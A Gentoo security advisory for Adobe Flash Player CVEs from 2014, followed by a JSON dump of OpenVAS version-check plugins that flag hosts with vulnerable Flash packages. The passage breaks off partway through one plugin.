### Background
The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites.
### Description
Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.
### Impact
A remote attacker could entice a user to open a specially crafted SWF file using Adobe Flash Player, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. Furthermore, a remote attacker may be able to bypass the Same Origin Policy or read the clipboard via unspecified vectors.
### Workaround
There is no known workaround at this time.
### Resolution
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose
">=www-plugins/adobe-flash-11.2.202.356"
{"openvas": [{"lastseen": "2019-05-29T18:36:11", "description": "Gentoo Linux Local Security Checks GLSA 201405-04", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201405-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0508", "CVE-2014-0503", "CVE-2014-0515", "CVE-2014-0498", "CVE-2014-0504", "CVE-2014-0507", "CVE-2014-0506", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121179", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201405-04.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121179\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:06 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201405-04\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201405-04\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\", \"CVE-2014-0503\", \"CVE-2014-0504\", \"CVE-2014-0506\", \"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\", \"CVE-2014-0515\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201405-04\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.356\"), vulnerable: make_list(\"lt 11.2.202.356\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:33", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2014:0535-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0508", "CVE-2014-0507", "CVE-2014-0506"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851050", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851050", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851050\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 18:56:30 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-0506\", \"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2014:0535-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Adobe flash-player has been updated to version 11.2.202.350\n to resolve security issues and bugs. More information can\n be found at\n\n The following security issues have been fixed:\n\n * a use-after-free vulnerability that could have\n resulted in arbitrary code execution (CVE-2014-0506).\n\n * a buffer overflow vulnerability that could have\n resulted in arbitrary code execution (CVE-2014-0507).\n\n * a security bypass vulnerability that could have lead\n to information disclosure (CVE-2014-0508).\n\n * a cross-site-scripting vulnerability (CVE-2014-0509).\n\n Security Issue references:\n\n * CVE-2014-0506\n\n * CVE-2014-0507\n\n * CVE-2014-0508\n\n * CVE-2014-0509\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0535-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.350~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.350~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.350~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-22T17:03:08", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-04-11T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0508", "CVE-2014-0507"], "modified": "2020-04-20T00:00:00", "id": "OPENVAS:1361412562310804539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804539", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Linux)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804539\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n script_bugtraq_id(66701, 66699, 66703);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-11 13:13:08 +0530 (Fri, 11 Apr 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error related to regular expressions in ActionScript.\n\n - An use-after-free error and multiple unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to conduct cross-site scripting\nattacks, bypass certain security restrictions, and compromise a user's system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.2.202.350 on Linux\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.2.202.350 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57661\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.350\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.350\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:38", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-04-11T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0508", "CVE-2014-0507"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310804537", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804537", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Windows)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804537\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n script_bugtraq_id(66701, 66699, 66703);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-04-11 12:45:39 +0530 (Fri, 11 Apr 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error related to regular expressions in ActionScript.\n\n - An use-after-free error and multiple unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to conduct cross-site scripting\nattacks, bypass certain security restrictions, and compromise a user's system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.275 and 11.8.x through 13.0.x\nbefore 13.0.0.182 on Windows\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.275 or 13.0.0.182 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57661\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.275\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"13.0.0.181\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:14", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-04-11T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0508", "CVE-2014-0507"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310804538", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804538", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804538\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n script_bugtraq_id(66701, 66699, 66703);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-04-11 13:09:05 +0530 (Fri, 11 Apr 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 02 Apr14 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error related to regular expressions in ActionScript.\n\n - An use-after-free error and multiple unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to conduct cross-site scripting\nattacks, bypass certain security restrictions, and compromise a user's system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.275 and 11.8.x through 13.0.x\nbefore 13.0.0.182 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.275 or 13.0.0.182 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57661\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.275\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"13.0.0.181\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:37:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2014:0290-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851089", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851089\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 19:45:17 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2014:0290-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update of Adobe Flash Player fixes the following\n issues:\n\n * A stack overflow vulnerability that could have\n resulted in arbitrary code execution. (CVE-2014-0498)\n\n * A memory leak vulnerability that could have been used\n to defeat memory address layout randomization.\n (CVE-2014-0499)\n\n * A double free vulnerability that could have resulted\n in arbitrary code execution. (CVE-2014-0502)\n\n Security Issue references:\n\n * CVE-2014-0498\n\n * CVE-2014-0499\n\n * CVE-2014-0502\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0290-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.341~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.341~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.341~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-12T11:09:53", "description": "Check for the Version of flash-player", "cvss3": {}, "published": "2014-02-25T00:00:00", "type": "openvas", "title": "SuSE Update for flash-player openSUSE-SU-2014:0278-1 (flash-player)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2017-12-08T00:00:00", "id": "OPENVAS:850571", "href": "http://plugins.openvas.org/nasl.php?oid=850571", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0278_1.nasl 8044 2017-12-08 08:32:49Z santu $\n#\n# SuSE Update for flash-player openSUSE-SU-2014:0278-1 (flash-player)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850571);\n script_version(\"$Revision: 8044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:32:49 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:47:57 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Update for flash-player openSUSE-SU-2014:0278-1 (flash-player)\");\n\n tag_insight = \"\n Adobe Flash Player was updated to 11.2.202.341: (bnc#865021)\n * APSB14-07, CVE-2014-0498 CVE-2014-0499 CVE-2014-0502\n - Contents of flashplayer_11_sa.i386.tar.gz changed back:\n spec file updated, supplementary script (update.sh)\n updated.\";\n\n tag_affected = \"flash-player on openSUSE 11.4\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"openSUSE-SU\", value: \"2014:0278_1\");\n script_summary(\"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.341~95.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.341~95.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.341~95.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-22T17:03:34", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-02-24T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2020-04-20T00:00:00", "id": "OPENVAS:1361412562310903340", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310903340", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Linux)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public 